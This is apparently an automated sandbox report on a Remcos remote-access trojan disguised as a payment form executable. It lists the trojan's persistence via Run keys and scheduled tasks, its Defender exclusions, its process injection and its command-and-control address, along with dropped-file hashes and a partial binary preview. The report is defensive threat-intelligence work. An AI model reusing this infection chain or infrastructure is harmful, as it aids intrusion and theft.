Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: cmd.exe 9_2_0040567A
Techniques per tactic column (numeric prefixes are the report's count badges, kept as displayed):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 1 Exploitation for Client Execution; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 11 Scripting; 1 DLL Side-Loading; 1 Windows Service; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 1 Windows Service; 122 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 122 Process Injection; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 33 System Information Discovery; 121 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 111 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1561752 | Sample: Payment Transfer Request Fo... | Startdate: 24/11/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures. Contacted domain: geoplugin.net.

Process tree (dropped files, signatures and network contacts listed under the process they belong to):

• Payment Transfer Request Form.bat.exe (started from sample)
    Dropped: C:\Users\user\AppData\Roaming\iKgKaogJ.exe (PE32); C:\Users\...\iKgKaogJ.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp854C.tmp (XML); Payment Transfer R...st Form.bat.exe.log (ASCII)
    Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    • Payment Transfer Request Form.bat.exe (child)
        Dropped: C:\ProgramData\AppUpdate\remcos.exe (PE32); C:\Users\user\AppData\Local\...\install.vbs (data); C:\ProgramData\...\remcos.exe:Zone.Identifier (ASCII)
        Signatures: Detected Remcos RAT
        • wscript.exe
            Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
            • cmd.exe
                • conhost.exe
                • remcos.exe
                    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    • remcos.exe (child)
                        Network: 212.162.149.226, 49754, 9285 (UNREAL-SERVERSUS, Netherlands); geoplugin.net 178.237.33.50, 49761, 80 (ATOM86-ASATOM86NL, Netherlands)
                        Signatures: Detected Remcos RAT
                    • powershell.exe
                        Signatures: Loading BitLocker PowerShell Module
                        • conhost.exe
                    • powershell.exe
                        • conhost.exe
                    • schtasks.exe
                        • conhost.exe
    • powershell.exe
        Signatures: Loading BitLocker PowerShell Module
        • conhost.exe
    • powershell.exe
        • conhost.exe
    • schtasks.exe
        • conhost.exe
• remcos.exe (started from sample)
    • remcos.exe
    • schtasks.exe
        • conhost.exe
• remcos.exe (started from sample)
    • remcos.exe
    • schtasks.exe
        • conhost.exe
• 2 other processes (started from sample)
    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • 2 other processes
        • conhost.exe

Source | Detection | Scanner | Label
Payment Transfer Request Form.bat.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
Payment Transfer Request Form.bat.exe | 61% | Virustotal | -
Payment Transfer Request Form.bat.exe | 100% | Joe Sandbox ML | -
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\install.vbs | 100% | Avira | VBS/Runner.VPD
C:\ProgramData\AppUpdate\remcos.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\iKgKaogJ.exe | 100% | Joe Sandbox ML | -
C:\ProgramData\AppUpdate\remcos.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
C:\ProgramData\AppUpdate\remcos.exe | 61% | Virustotal | -
C:\Users\user\AppData\Roaming\iKgKaogJ.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
149.226 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | - | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | - | high
149.226 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/iv | remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://tempuri.org/ianiDataSet1.xsd | Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | false | - | high
http://geoplugin.net/PU | remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gp/C | Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Payment Transfer Request Form.bat.exe, 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://tempuri.org/ianiDataSet2.xsdM | Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | false | - | high
http://geoplugin.net/json.gpal | remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Payment Transfer Request Form.bat.exe, 00000000.00000002.1414846976.000000000282C000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000000F.00000002.1535563914.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000018.00000002.1598556738.000000000319F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000001D.00000002.1679679015.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000021.00000002.1760390363.00000000030DF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | false | - | high
http://geoplugin.net/json.gpSystem32 | remcos.exe, 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/_IDENTIFIER=Intel64 | remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://tempuri.org/ianiDataSet.xsd | Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.dr | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
212.162.149.226 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561752
Start date and time: 2024-11-24 08:22:40 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment Transfer Request Form.bat.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@49/31@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 180
• Number of non-executed functions: 190
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:23:29 | API Interceptor | 2x Sleep call for process: Payment Transfer Request Form.bat.exe modified
02:23:36 | API Interceptor | 73x Sleep call for process: powershell.exe modified
02:23:40 | API Interceptor | 2x Sleep call for process: iKgKaogJ.exe modified
02:23:40 | API Interceptor | 4016671x Sleep call for process: remcos.exe modified
07:23:37 | Task Scheduler | Run new task: iKgKaogJ path: C:\Users\user\AppData\Roaming\iKgKaogJ.exe
07:23:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AppUpdate "C:\ProgramData\AppUpdate\remcos.exe"
07:23:48 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AppUpdate "C:\ProgramData\AppUpdate\remcos.exe"
07:23:56 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AppUpdate "C:\ProgramData\AppUpdate\remcos.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
178.237.33.50 | CargoInvoice_Outstanding_56789_2024-11-21.vbs | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | payment receipt copy.bat.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 018292540-LetterReguranPPI-20230814215304.PDF.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 800399031-18.11.2024.pdf.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Purchase Inquiry_002.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | APPENDIX FORM_N#U00b045013-20241120.com.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | wE1inOhJA5.msi | Get hash | malicious | Remcos, RHADAMANTHYS | Browse | geoplugin.net/json.gp
212.162.149.226 | Invoice.GT872905.pdf.exe | Get hash | malicious | Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s-part-0035.t-0009.t-msedge.net | Marine Energy Sdn Bhd Request for Quotation.exe | Get hash | malicious | FormBook | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | purchase Order.exe | Get hash | malicious | FormBook | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC Stealer | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC Stealer | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 4yOuoT4GFy.exe | Get hash | malicious | AsyncRAT | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC Stealer | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC Stealer | Browse | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC Stealer | Browse | 13.107.246.63
geoplugin.net | CargoInvoice_Outstanding_56789_2024-11-21.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | payment receipt copy.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 018292540-LetterReguranPPI-20230814215304.PDF.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 800399031-18.11.2024.pdf.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Purchase Inquiry_002.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | APPENDIX FORM_N#U00b045013-20241120.com.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | wE1inOhJA5.msi | Get hash | malicious | Remcos, RHADAMANTHYS | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UNREAL-SERVERSUS | Pago_BBVA.pdf.bat.exe | Get hash | malicious | Remcos | Browse | 162.251.122.76
UNREAL-SERVERSUS | PO - HTS - 0893.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.35
UNREAL-SERVERSUS | PO - HTS - 0893.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.35
UNREAL-SERVERSUS | PO 331385674200010.exe | Get hash | malicious | FormBook, GuLoader | Browse | 212.162.149.35
UNREAL-SERVERSUS | Vodka.exe | Get hash | malicious | Remcos, GuLoader | Browse | 212.162.149.35
UNREAL-SERVERSUS | O0rhQM49FL.exe | Get hash | malicious | GuLoader | Browse | 212.162.151.158
UNREAL-SERVERSUS | cIs9D0juC8.exe | Get hash | malicious | Remcos, GuLoader | Browse | 212.162.149.7
UNREAL-SERVERSUS | Intesa.Sanpaolo.Pagamento.pdf.exe | Get hash | malicious | Remcos | Browse | 204.10.160.239
UNREAL-SERVERSUS | RFQ-24064562-SUPPLY-NOv-ORDER.com.exe | Get hash | malicious | Remcos, GuLoader | Browse | 185.149.234.209
UNREAL-SERVERSUS | 7ZpqVr5abI.exe | Get hash | malicious | GuLoader | Browse | 162.251.122.91
ATOM86-ASATOM86NL | CargoInvoice_Outstanding_56789_2024-11-21.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | payment receipt copy.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 018292540-LetterReguranPPI-20230814215304.PDF.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 800399031-18.11.2024.pdf.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Purchase Inquiry_002.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | APPENDIX FORM_N#U00b045013-20241120.com.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | wE1inOhJA5.msi | Get hash | malicious | Remcos, RHADAMANTHYS | Browse | 178.237.33.50
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1243656
                                            Entropy (8bit):7.6645164763774805
                                            Encrypted:false
                                            SSDEEP:24576:RYdgfvzAKzxWCC9vSA6GRdsttHVqowvVpBdlvlOUa:rzAcWFt96ydyQow5dldna
                                            MD5:FC5A80ADF45D78FFA834283D0A78F9F6
                                            SHA1:6865DEC6F71546EA01420295B7175038C3A81EC4
                                            SHA-256:E588A098E9CEB33F2616E11A3FAF28162E5F4B7F3800B22AB3023BC376AEB18C
                                            SHA-512:27636CD0D31E3B1FF384869F1F2BE6C23D7F02ECD70027C5D689DE0893835D070218596A941472481D637CC6253ED3F2405991A6AF4772596CC88F909A7DD7CB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 53%
                                            • Antivirus: Virustotal, Detection: 61%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>g..............0......(.......... ........@.. ....................... ............@.....................................O........%...............6........................................................... ............... ..H............text....... ...................... ..`.rsrc....%.......&..................@..@.reloc..............................@..B.......................H............3..........tJ.. n............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):962
                                            Entropy (8bit):5.01442467270497
                                            Encrypted:false
                                            SSDEEP:12:tkluQ+nd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydVauKyGX85jvXhNlT3/7AcV9Wro
                                            MD5:4A8FAD17775993221C3AD2D68BB4B306
                                            SHA1:DB42C3975A64E7B4CE2A93FF5AF91F2DF73C82BD
                                            SHA-256:893F1B254D4EC2484868976F1B62D5A064909EA08E46F95193DBE79DB435E604
